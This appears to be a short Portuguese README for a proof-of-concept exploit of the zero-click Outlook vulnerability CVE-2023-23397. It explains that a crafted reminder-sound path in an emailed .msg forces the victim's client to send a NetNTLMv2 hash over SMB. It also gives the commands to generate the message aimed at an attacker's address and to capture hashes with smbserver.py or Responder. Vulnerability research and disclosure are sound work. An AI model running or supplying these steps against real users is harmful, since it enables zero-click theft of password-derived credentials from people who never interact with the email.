
PoC simples da vulnerabilidade CVE-2023-23397 com o payload enviado por e-mail.
PoC simples e sujo da vulnerabilidade CVE-2023-23397 que afeta o cliente espesso do Outlook.
O Outlook sofre de falta de controlo sobre a entrada do utilizador que permite configurar o som de um lembrete de reunião e compromisso. De facto, um atacante consegue forçar uma vítima a estabelecer uma ligação ao seu servidor sem qualquer manipulação por parte do utilizador (vulnerabilidade de clique zero).
Um atacante que explore esta vulnerabilidade obtém um digest NetNTLMv2 baseado na palavra-passe do utilizador capturado através de um pedido SMB. O pedido é despoletado assim que o correio chega à caixa de entrada.
.msg gerado.Numa sessão:
python CVE-2023-23397.py
usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path
python CVE-2023-23397.py --path '\\yourip\'
Numa segunda sessão (smbserver ou responder conforme desejar).
smbserver.py -smb2support SHARE .
